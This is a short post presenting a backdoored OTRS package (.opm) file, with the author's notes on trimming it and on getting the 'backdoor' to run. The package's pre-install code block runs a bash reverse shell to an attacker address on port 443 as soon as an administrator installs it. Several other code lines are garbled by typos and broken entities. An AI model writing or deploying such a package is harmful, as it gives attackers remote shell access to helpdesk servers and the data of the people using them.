OTRS OPM backdoored Package with Reverse Shell

MyPackage.opm

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>
	<BuildDate>2016-09-23 11:17:41</BuildDate>
	<BuildHost>opms.otrs.com</BuildHost>
	<Framework>5.0.x</Framework>
	<IntroInstall Lang="en" Title="My Module" type="pre">
		&lt;br&gt;
		Hello wolrd
		&lt;br&gt;
		((Hello!))
		&lt;br&gt
	</IntroInstall>
	<CodeInstall type="pre">
		print qx(bash -i >& /dev/tcp/<ATTACKER_IP>/443 0>&1 &);
	</CodeInstall>
	<CodeInstall Type="post">
		# create the package name
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content};
		$Kernel::OM-&gt;Get($ModeModule)-%gt;CodeInstall();
	</CodeInstall>
	<CodeUninstall type="pre">
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};
		$Kernel::OM-&gt;Get($CodeModule)-&gt;CodeUninstall();
	</CodeUninstall>
</otrs_package>

As per the specs published by OTRS, BuildDate and BuildHost are auto-filled by the server. No need to include those.

After lots of testing, I ascertained that you technically don't need the blocks CodeInstall-post and CodeUninstall-pre.

I'm now fighting with the IntroInstall, trying to figure out why the OPM won't run the backdoor unless the IntroInstall contains specific chars.